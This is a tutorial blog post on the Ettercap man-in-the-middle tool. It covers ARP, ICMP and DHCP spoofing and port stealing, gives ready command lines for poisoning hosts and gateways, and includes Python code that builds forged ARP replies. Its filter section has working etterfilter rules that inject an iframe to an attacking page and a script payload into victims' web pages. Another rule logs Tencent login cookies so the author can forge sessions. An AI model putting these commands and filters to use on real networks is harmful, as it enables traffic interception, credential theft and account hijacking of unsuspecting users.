Ettercap: a brief introduction to how it works and how to use it
December 18th, 2021

0x01 ettercap interface introduction

Ettercap has four interfaces: Text, Curses, GTK2 and Daemonize.

The Text interface (-T) is what we usually call the command-line interface: it only prints characters. It is normally combined with -q (quiet mode), which suppresses the dump of captured packet contents; extracted information such as usernames and passwords is still printed.
Curses (-C) and GTK2 (-G) are the interactive interfaces (keyboard menus and a mouse-driven GUI respectively); they are skipped here.
Daemonize (-D) is daemon mode: ettercap detaches and runs in the background, typically combined with -L logging.

The Text interface is the one used in the examples that follow.

0x02 ettercap running mode

Ettercap has two sniffing modes, UNIFIED and BRIDGED.

UNIFIED sniffs on a single interface and, combined with a man-in-the-middle method, lets you see traffic that is not addressed to you; BRIDGED sniffs the packets passing between two NICs on a host with two interfaces.

The general idea of the UNIFIED mode is to trick both A and B into sending the packets meant for each other to a third host C, which forwards them on to the real destination, so C sits in the middle. The mode performs that deception and analyzes the packets: ettercap hijacks the conversation between A and B, and from ettercap's point of view A and B are symmetric. There is no notion of source or destination, only TARGET1 and TARGET2.

The BRIDGED mode resembles a laptop with a wired NIC and a wireless NIC that shares the wired connection over wireless, turning the laptop into an access point: all traffic from the wireless clients crosses the laptop on its way to the wired NIC, and ettercap sniffs (and can filter) the packets as they pass between the two interfaces. It is selected with -B <second interface>. Since the host itself is the path, no spoofing is needed and nothing on the wire reveals that someone is in the middle.

In general we use the UNIFIED mode. Its attack parameter is -M (for MITM, man-in-the-middle), which selects one of the poisoning methods described in 0x04.

0x03 ettercap target selection

Targets are written in the form MAC/IPs/PORTs, and with this rule we can pin a target down to specific hosts and ports.
MAC, IP and PORT are three conditions; an empty field means ANY. The three conditions are ANDed, i.e. a packet matches only when all three hold at the same time. For example, "//80" means port 80 on any MAC and any IP.
The MAC part is usually left blank, unless you feel like working through a long list of MAC addresses by hand, so in practice the IP part alone identifies the target host.

For multiple IPs, "," separates individual values inside one expression (e.g. different values of the last octet), "-" denotes a consecutive range, and ";" separates different IP expressions. Examples:
"10.0.0.1-5;10.0.1.33" means 10.0.0.1, 2, 3, 4, 5 and 10.0.1.33
"10.0.0.1,3,7" means 10.0.0.1, 10.0.0.3 and 10.0.0.7
The port part is written the same way:
"20-25,80,110" means 20, 21, 22, 23, 24, 25, 80 and 110
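To check what a target spec actually covers before poisoning anything, here is a small expander for the MAC/IPs/PORTs syntax described above. It is an added example, not ettercap's own parser; it follows the rules the man page documents (empty field = ANY, ";" between IP expressions, "," between values inside an octet or port list, "-" for inclusive ranges, the three fields ANDed). The DHCP address pool in 0x04 uses the same range syntax, so expand_ips() works for it too. The function and class names are the example's own.

```python
"""Expand an ettercap TARGET spec (MAC/IPs/PORTs) into concrete sets.

Added example; this is not ettercap's own parser.  It follows the syntax the
man page documents: empty field = ANY, ";" separates IP expressions, "," lists
values inside one octet (or the port list), "-" is an inclusive range, and the
three fields are ANDed.  The DHCP pool in 0x04 uses the same range syntax.
"""
import re
from dataclasses import dataclass
from itertools import product
from typing import FrozenSet, Optional

_MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$", re.I)


def expand_list(field: str, lo: int, hi: int) -> FrozenSet[int]:
    """'1-5,7' -> {1,2,3,4,5,7}; every value must lie in lo..hi."""
    values = set()
    for item in field.split(","):
        item = item.strip()
        if not item:
            raise ValueError(f"empty element in {field!r}")
        first, _, last = item.partition("-")
        a, b = int(first), int(last or first)
        if not (lo <= a <= b <= hi):
            raise ValueError(f"{item!r} is not a valid range within {lo}..{hi}")
        values.update(range(a, b + 1))
    return frozenset(values)


def expand_ips(spec: str) -> FrozenSet[str]:
    """'10.0.0.1-5;10.0.1.33' -> {'10.0.0.1', ..., '10.0.0.5', '10.0.1.33'}.

    Each octet may itself be a list/range, so '10.0.0-1.1' is also accepted.
    """
    ips = set()
    for expr in spec.split(";"):
        octets = expr.strip().split(".")
        if len(octets) != 4:
            raise ValueError(f"not an IPv4 expression: {expr!r}")
        per_octet = [sorted(expand_list(o, 0, 255)) for o in octets]
        for combo in product(*per_octet):
            ips.add(".".join(map(str, combo)))
    return frozenset(ips)


def expand_ports(spec: str) -> FrozenSet[int]:
    """'20-25,80,110' -> {20, ..., 25, 80, 110}."""
    return expand_list(spec, 0, 65535)


@dataclass(frozen=True)
class Target:
    mac: Optional[str]                 # None means ANY
    ips: Optional[FrozenSet[str]]      # None means ANY
    ports: Optional[FrozenSet[int]]    # None means ANY

    def matches(self, mac: str, ip: str, port: int) -> bool:
        """All three conditions must hold at the same time."""
        return ((self.mac is None or self.mac == mac.lower())
                and (self.ips is None or ip in self.ips)
                and (self.ports is None or port in self.ports))


def parse_target(spec: str) -> Target:
    """Parse 'MAC/IPs/PORTs'; e.g. '//80' is any MAC, any IP, port 80 only.

    Builds with IPv6 support take a fourth field (MAC/IPs/IPv6/PORTs); that
    form is not handled here.
    """
    parts = [p.strip() for p in spec.split("/")]
    if len(parts) != 3:
        raise ValueError("a target needs exactly two '/' separators: MAC/IPs/PORTs")
    mac, ips, ports = parts
    if mac and not _MAC_RE.match(mac):
        raise ValueError(f"bad MAC address {mac!r}")
    return Target(mac=mac.lower() or None,
                  ips=expand_ips(ips) if ips else None,
                  ports=expand_ports(ports) if ports else None)


if __name__ == "__main__":
    # The two examples from the text, expanded.
    print(sorted(expand_ips("10.0.0.1-5;10.0.1.33")))
    print(sorted(expand_ports("20-25,80,110")))
    print(parse_target("//80"))
```

Run it on a spec before you pass it to ettercap: a range that silently expands to more hosts than you intended (a typo such as 10.0.0.1-50 instead of 10.0.0.1-5) is easy to spot here and expensive to discover once the poisoning is running.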

0x04 ettercap's man-in-the-middle attack

When we specify the -M parameter, i.e. a man-in-the-middle attack, the following attack types are available.

  1. Man-in-the-middle attack with ARP poisoning

The principle of ARP poisoning is simply to forge the IP-to-MAC mapping in the victims' ARP caches so that their packets are delivered to the man in the middle, who forwards them on. For details see:
http://www.2cto.com/Article/201207/144532.html

The arp method takes two optional flags, remote and oneway. By default ettercap poisons the ARP caches of both targets and listens to the communication between them in both directions. oneway poisons only from TARGET1 towards TARGET2, i.e. only TARGET1's cache is spoofed, so only the traffic TARGET1 sends to TARGET2 is seen. remote does not change who gets poisoned: it tells ettercap to also treat connections whose other end lies outside the LAN (reached through a poisoned gateway) as traffic between the targets, so it is needed practically whenever one of the targets is the router. Generally we use arp:remote, which gives us all the packets for sniffing and analysis.
For example: -M arp:remote /10.0.0.2/ // poisons host 10.0.0.2 against every other host and sniffs all of its communication, both the packets it sends and the packets it receives.

What if the target host has an ARP firewall enabled? Spoofing it directly triggers an alarm and has no effect. This is where one-way ARP poisoning comes into play: as long as the router has no static IP-to-MAC binding, we spoof only the router, so the packets the router sends to the target host pass through the man in the middle (the target's own outgoing packets still go straight to the router). The syntax is -M arp:remote,oneway /router/ /target/, with the router as TARGET1, because oneway only poisons TARGET1.
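The forged replies behind the two variants, as an added illustration that is not ettercap's code: it builds the raw ARP reply frames that one poisoning round sends for a router/target pair (made-up MAC and IP addresses), feeds them to a toy model of each victim's ARP cache, and shows that the default poisons both caches while oneway leaves TARGET2's cache clean. Ettercap itself builds these frames with libnet and re-sends them periodically so the entries do not expire; the function names here are the example's own.

```python
"""Forged ARP replies behind '-M arp', bidirectional versus oneway.

Added illustration, not ettercap's code (ettercap builds and re-sends these
frames itself, with libnet).  Frame layout is Ethernet II + RFC 826 ARP; all
MACs and addresses below are made-up sample values.  A tiny model of each
victim's ARP cache shows which direction of traffic ends up at the attacker.
"""
import struct
from ipaddress import IPv4Address
from typing import Dict, List, Tuple

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2
Host = Tuple[str, str]           # (ip, mac)


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def arp_reply(src_mac: str, sender_ip: str, sender_mac: str,
              target_ip: str, target_mac: str) -> bytes:
    """Unicast ARP reply 'sender_ip is-at sender_mac', addressed to target_mac.

    A poisoning reply lies in the sender fields: the IP belongs to a real
    host, the MAC is the attacker's.
    """
    eth = mac_bytes(target_mac) + mac_bytes(src_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # htype, ptype, hlen, plen, op
           + mac_bytes(sender_mac) + IPv4Address(sender_ip).packed
           + mac_bytes(target_mac) + IPv4Address(target_ip).packed)
    return eth + arp                                          # 14 + 28 = 42 bytes


def poison_round(attacker_mac: str, t1: Host, t2: Host, oneway: bool = False) -> List[bytes]:
    """One poisoning round for TARGET1 t1 and TARGET2 t2.

    Default: both caches are spoofed (t1 learns 't2 is at attacker' and vice
    versa).  oneway: only t1's cache is spoofed, so t2 (e.g. a host running an
    ARP watcher) never receives a forged reply.
    """
    frames = [arp_reply(attacker_mac, t2[0], attacker_mac, t1[0], t1[1])]
    if not oneway:
        frames.append(arp_reply(attacker_mac, t1[0], attacker_mac, t2[0], t2[1]))
    return frames


def parse_arp(frame: bytes) -> Dict[str, str]:
    """Decode the fields a victim acts on."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame")
    return {
        "dst_mac": mac_str(frame[0:6]),
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": str(IPv4Address(frame[28:32])),
        "target_ip": str(IPv4Address(frame[38:42])),
    }


def apply_replies(caches: Dict[str, Dict[str, str]], frames: List[bytes]) -> Dict[str, Dict[str, str]]:
    """Model of the victims: a host (keyed by its MAC) accepts any reply it
    receives and overwrites its entry for sender_ip.  That trust is the
    weakness being abused."""
    for f in frames:
        p = parse_arp(f)
        caches.setdefault(p["dst_mac"], {})[p["sender_ip"]] = p["sender_mac"]
    return caches


def next_hop_mac(caches: Dict[str, Dict[str, str]], host_mac: str, dst_ip: str) -> str:
    """Which MAC host_mac will put on frames for dst_ip after poisoning."""
    return caches[host_mac][dst_ip]


if __name__ == "__main__":
    attacker = "0a:0a:0a:0a:0a:0a"
    router, victim = ("10.0.0.1", "02:00:00:00:00:01"), ("10.0.0.2", "02:00:00:00:00:02")
    clean = {router[1]: {victim[0]: victim[1]}, victim[1]: {router[0]: router[1]}}
    for oneway in (False, True):
        caches = apply_replies({k: dict(v) for k, v in clean.items()},
                               poison_round(attacker, router, victim, oneway))
        print("oneway" if oneway else "bidirectional",
              "router->victim via", next_hop_mac(caches, router[1], victim[0]),
              "victim->router via", next_hop_mac(caches, victim[1], router[0]))
```

With oneway and the router as TARGET1, only the router's entry for the target changes, which is exactly the case above: the target's ARP watcher sees nothing because no forged reply is ever addressed to it, while everything the router sends to the target now arrives at the attacker's MAC.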

  2. ICMP redirect spoofing

ICMP spoofing is a route-spoofing technique based on ICMP redirect messages. Ettercap sends spoofed redirects that appear to come from the real gateway and tell the other hosts that this machine is the better route, so they send their outbound packets here and this machine forwards them on to the real router, which lets us listen to them. Only the clients are redirected (the gateway does not accept a redirect for a directly connected network), so the result is a half-duplex man in the middle: you see what the clients send out, not the replies coming back to them. Hosts configured to ignore redirects (on Linux, net.ipv4.conf.all.accept_redirects = 0) are not affected at all, which is why on a switched LAN ARP poisoning is usually the more reliable choice.
The parameters of the ICMP method are the MAC and IP of the real router, in the form MAC/IP. Example:
-M icmp:00:11:22:33:44:55/10.0.0.1

  3. DHCP spoofing

The basic idea of DHCP spoofing is to pose as a DHCP server and race the real one to answer new clients, handing out addresses with ourselves as the gateway. The drawbacks: addresses from our pool may collide with ones the real server hands out, and only hosts that (re)negotiate a lease are affected, not hosts that already have one. Like the ICMP method this is half-duplex: the clients send their outbound traffic through us, but the gateway's replies go straight back to them.
The parameters are the pool of addresses to hand out, the netmask and the DNS server, in the form ip_pool/netmask/dns (the pool uses the same range syntax as targets). Example:
-M dhcp:192.168.0.30,35,50-60/255.255.255.0/192.168.0.1
meaning addresses are assigned from 192.168.0.30, .35 and .50 to .60, with netmask 255.255.255.0 and DNS server 192.168.0.1. With an empty pool (-M dhcp:/255.255.255.0/192.168.0.1) ettercap replies only to the clients' DHCP requests, not to discovers, so the client keeps the address the real server offered and only the gateway and DNS fields are substituted, which avoids the address conflicts.

  4. Port stealing

This attack is for switched environments where the router has a static IP-to-MAC binding and cannot be ARP-poisoned. The basic idea: if the router's IP-to-MAC mapping cannot be spoofed, spoof the switch instead. The attacker floods the switch with frames whose source MAC is the victim's MAC (addressed to the attacker's own MAC, so no other NIC sees them), so the switch's forwarding table learns the victim's MAC on the attacker's port, and frames that should have reached the victim through its own port are delivered to the attacker's port instead. When such a "stolen" packet arrives, ettercap pauses the flooding, sends an ARP request for the real destination so that the victim reclaims its port, re-sends the packet to it, and starts flooding again. (My own understanding of this part is limited; corrections from those who know it better are welcome.)
Because this method only works in a switched environment and generates a large volume of frames, seriously degrading the network, think twice before using it. It is selected with -M port:remote (the remote flag has the same meaning as for arp).

I only actually tested attack types 1 and 4. Type 1 behaved exactly as expected, while type 4 produced the following errors:

    ERROR : 90, Message too long
    [ec_send.c:send_to_L2:213]
    libnet_write 1586 (-1): libnet_write_link(): only -1 bytes written (Message too long)

Also, if you want to use ettercap only as the man in the middle and sniff the data with other software, add the -o (only-mitm) parameter.

Note:
In UNIFIED mode ettercap forwards the intercepted packets itself (after running the filters) and disables the kernel's IP forwarding so that nothing is forwarded twice. The exception is -o (only-mitm): the sniffing thread is disabled, ettercap does not forward anything, and the kernel has to do it, so enable forwarding first (sysctl -w net.ipv4.ip_forward=1), otherwise the victims simply lose connectivity.
For more information, see http://www.cnblogs.com/gunl/archive/2010/09/14/1826234.html

0x05 Common parameters and combinations for ettercap

-I            list the available NICs
-i <iface>    select the NIC to sniff on
-t <proto>    protocol filter: tcp, udp or all (default: tcp and udp)
-p            do not put the NIC in promiscuous mode (only traffic the host would receive anyway)
-z            silent mode: skip the initial ARP scan of the LAN, so no host list is built
-F <file>     load a compiled filter file
-V text       display packet payloads as text (other formats: hex, ascii, ebcdic, html, utf8)
-L <name>     log all packets and infos to <name>.ecp and <name>.eci (binary files, readable only with etterlog); -l logs the infos only

A few common combinations of parameters:
ettercap -Tzq
Text interface, no ARP scan and no poisoning: only the traffic that already reaches the interface is sniffed (on a switch, essentially this host's own traffic), and only extracted information such as usernames and passwords is shown.
ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.2-10/
Poison the gateway (192.168.1.1) and the hosts 192.168.1.2-10 against each other and sniff their traffic in both directions, including the hosts' Internet traffic that passes through the gateway (that is what remote is for).
ettercap -Tzq //110
Sniff only port 110 (POP3) among the packets the interface already sees, no poisoning.
ettercap -Tzq /10.0.0.1/21,22,23
Sniff only this host's own communication with 10.0.0.1 on ports 21, 22 and 23.
ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote /10.1.1.2/80 //
On eth0, ARP-poison host 10.1.1.2 against everyone, apply the filter filter.ef, sniff its port-80 traffic and log everything to sniffed_data.ecp / sniffed_data.eci.
ettercap -i eth0 -Tq -L sniffed_data -F filter.ef -M arp:remote,oneway /10.1.1.1/ /10.1.1.2/
One-way poisoning of the router 10.1.1.1 only: hijack just the packets the router sends to 10.1.1.2. The oneway flag is what makes this one-way; without it both sides are poisoned.

0x06 ettercap filter writing

A good tool with a good filter rule is perfect!

Ettercap's filter rules have to be compiled before they can be loaded with the -F parameter.
The command to compile a filter rule is
etterfilter filter.ecf -o filter.ef
i.e. the source file filter.ecf is compiled into filter.ef, the binary form that ettercap understands.
The rule syntax resembles C, but only if/else statements are available; there are no loops. Note that there must be a space between if and "(", and the curly brackets {} cannot be omitted.

Some of the common functions provided by etterfilter are:
search(where, what)   looks for the string what in the buffer where and returns true if found
regex(where, regex)   matches the regular expression regex against the buffer where and returns true if it matches
replace(what, with)   replaces the string what with the string with (the lengths may differ; the packet grows or shrinks accordingly)
log(what, where)      appends the buffer what to the file where
msg(message)          prints message on the screen
drop()                drops the current packet; kill() tears the connection down instead
exit()                ends execution of the filter for the current packet

To learn quickly how to write etterfilter rules, my personal habit is to read some existing examples and then write my own along the same lines.
The classic example I saw on a blog is the HTTP iframe injector below. The HTML tag names inside its strings and the tail of its last line were lost when this page was extracted; the tags are restored from the accompanying comments, and the iframe attributes are left elided:

    # --Strip compression from requests so the reply comes back as plain text--
    # (traffic to 192.1.1.200, presumably the attacker's own host, is left alone)
    if (ip.proto == TCP && ip.dst != '192.1.1.200') {
       # the port test is a separate if so that the || cannot swallow the ip.dst check
       if (tcp.dst == 80 || tcp.dst == 8080) {
          # ...and if it contains an Accept-Encoding header...
          if (search(DATA.data, "Accept-Encoding")) {
             # ...remove any Encoding (make sure we are using plain text).
             # Same length as the original string, so the request size is unchanged.
             replace("Accept-Encoding", "Accept-Nothing!");
          }
       }
    }
    # --Inject Iframe-- (on the server's replies, hence tcp.src)
    if (ip.proto == TCP && ip.dst != '192.1.1.200') {
       if (tcp.src == 80 || tcp.src == 8080) {
          # tag names restored from the comments; the iframe attributes were cut off in the source
          if (search(DATA.data, "<body>")) {
             # Replace it with the body tag and an iframe to our attacking webpage
             replace("<body>", "<body><IFRAME ...></IFRAME>");
             msg("iframe injected after <body>\n");
          }
          if (search(DATA.data, "<BODY>")) {
             replace("<BODY>", "<BODY><IFRAME ...></IFRAME>");
          }
       }
    }

In the code above, the first part replaces Accept-Encoding in the HTTP request headers so that the web server returns the original data rather than compressed (e.g. gzip) data, which makes sniffing and analysis convenient; note that the replacement is the same length as the original, so the packet size does not change. The second part finds the <body> (or <BODY>) tag in the returned data and appends an iframe after it.
From this example we can see that the main job of a filter is to find fields in the data and replace them. That is why the examples seen around the web plant drive-by download (trojan) iframes or insert a piece of JavaScript, i.e. anything XSS can do. Keep in mind that replace() does not update the HTTP Content-Length header, so an injection that makes the body longer can have the tail of the page cut off by the browser.
See http://fuzzexp.org/ettercap-filter-rules-send.html for more rules.

I would like to present a filter rule of my own that records the cookies for specific websites:

    if (ip.proto == TCP && tcp.dst == 80 && ip.src == '10.0.0.2') {
       # same-length replacement, keeps the reply uncompressed
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Mousecat");
       }
       if (search(DATA.data, "Cookie:")) {
          if (search(DATA.data, "qq")) {
             # "qq" can be replaced with another website keyword
             log(DATA.data, "/tmp/qqlog.txt");
          }
       }
    }

This rule captures the two cookies Tencent uses for authentication, skey and uin, after which you can forge the login state and do whatever you want. This is more direct than stealing cookies via XSS and is not stopped by HttpOnly, since the cookie is read off the wire rather than out of the browser (it only works while the site is served over plain HTTP, which is what the tcp.dst == 80 condition selects).
There is another, purely cute one:

    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Mousecat");
       }
    }
    # The injection has to run on the server's reply (tcp.src == 80), not on the
    # request. The tag name inside the strings was lost in extraction; <body> is assumed here.
    if (ip.proto == TCP && tcp.src == 80) {
       replace("<body>", "<body><script>alert(/h4cked by deleter/)</script>");
    }

Every time a page is opened a dialog box pops up, just to be cute...
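The three rule bodies in this section, re-implemented over a constructed HTTP request and response, as an added example that is neither etterfilter nor ettercap code: the same-length Accept-Encoding rewrite, cookie logging keyed on a site keyword, and injecting the alert payload after <body> on the server's reply. It also shows the Content-Length fix-up that etterfilter's replace() does not perform, since the filter engine works on raw TCP payload and knows nothing about HTTP. The sample traffic is made up (reserved example.com domain, fake cookie values) and the function names are the example's own.

```python
"""What the etterfilter rules above do to a plain-HTTP exchange, in Python.

Added example; this is neither ettercap nor etterfilter code.  It re-implements
the rule bodies over a constructed request/response pair (made-up traffic, not
a capture) so the effects can be checked without a live MITM: the same-length
Accept-Encoding rewrite, cookie logging keyed on a site keyword, and injecting
markup after <body> on the server's reply.  replace() in etterfilter works on
raw TCP payload and knows nothing about HTTP, so the Content-Length fix-up an
injection needs is shown separately.
"""
from typing import List

# Constructed sample traffic (RFC 2606 reserved domain, fake cookie values).
SAMPLE_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"Cookie: uin=o0123456789; skey=@AbCdEfGhIj\r\n"
    b"\r\n"
)
_BODY = b"<html><head><title>t</title></head><body><p>hello</p></body></html>"
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: " + str(len(_BODY)).encode() + b"\r\n"
    b"\r\n" + _BODY
)
PAYLOAD = b"<script>alert(/h4cked by deleter/)</script>"


def etter_replace(data: bytes, what: bytes, with_: bytes) -> bytes:
    """etterfilter replace(): byte-wise, case-sensitive, every occurrence."""
    return data.replace(what, with_)


def strip_accept_encoding(request: bytes) -> bytes:
    """Rule on tcp.dst == 80: replace("Accept-Encoding", "Accept-Mousecat").

    Same length on purpose (15 bytes either way) so the segment size does not
    change; the server ignores the unknown header and replies uncompressed,
    which is what makes the later search/replace on the reply possible.
    """
    return etter_replace(request, b"Accept-Encoding", b"Accept-Mousecat")


def log_cookie(request: bytes, keyword: bytes, sink: List[bytes]) -> bool:
    """Rule: if search(DATA.data, "Cookie:") { if search(DATA.data, keyword) log() }."""
    if b"Cookie:" in request and keyword in request:
        sink.append(request)
        return True
    return False


def inject_after_body(response: bytes, snippet: bytes) -> bytes:
    """Rule on tcp.src == 80: replace("<body>", "<body>" + snippet).

    Must run on the server-to-client direction; a request carries no <body>,
    so applying it to the request side changes nothing.
    """
    return etter_replace(response, b"<body>", b"<body>" + snippet)


def declared_content_length(response: bytes) -> int:
    """Content-Length as advertised in the headers, -1 if absent."""
    head = response.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            return int(line.split(b":", 1)[1])
    return -1


def fix_content_length(response: bytes) -> bytes:
    """Rewrite Content-Length to the real body size.

    Only possible when the headers and the whole body sit in the same segment;
    for a bigger page the browser would otherwise stop reading at the old
    length and lose the tail of the page (chunked replies break differently).
    """
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep:
        return response
    lines = [b"Content-Length: " + str(len(body)).encode()
             if line.lower().startswith(b"content-length:") else line
             for line in head.split(b"\r\n")]
    return b"\r\n".join(lines) + sep + body


if __name__ == "__main__":
    sink: List[bytes] = []
    req = strip_accept_encoding(SAMPLE_REQUEST)
    log_cookie(req, b"example", sink)
    resp = fix_content_length(inject_after_body(SAMPLE_RESPONSE, PAYLOAD))
    print(req.decode(), resp.decode(), f"logged {len(sink)} cookie request(s)", sep="\n")
```

The length bookkeeping is the part that bites in practice: the request rewrite is harmless because it is length-preserving, while the injected reply grows by the payload size, and unless something corrects Content-Length (which a real filter cannot do when the headers and the injected chunk land in different segments) the browser truncates the page by exactly that many bytes.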

Points to note:
Ettercap must be started as root, but after opening the link-layer socket it drops its privileges to nobody, so log files must go in a directory that user can write to, such as /tmp/.

0x07 etterlog analysis data

Etterlog reads and analyzes the log files written by ettercap's -L or -l parameters. Its full option set is not covered here; the two commands I personally find most useful are etterlog -A sniffed_data.ecp > 1.txt, which converts the binary log into displayable ASCII text and saves it in 1.txt, and etterlog -B sniffed_data.ecp > 1.data, which dumps the payload data as is into a file.

0x08 References & Further Reading

The most helpful resources are the official man pages:
http://linux.die.net/man/8/ettercap
http://linux.die.net/man/8/etterlog
http://linux.die.net/man/8/etterfilter

Breaking ssl sniffing passwords with sslstrip and ettercap
http://www.2cto.com/Article/201009/75322.html
Man-in-the-middle attack demonstration and prevention against SSL
http://www.2cto.com/Article/201211/169512.html
Man-in-the-middle attack-ARP poisoning
http://www.2cto.com/Article/201207/144532.html
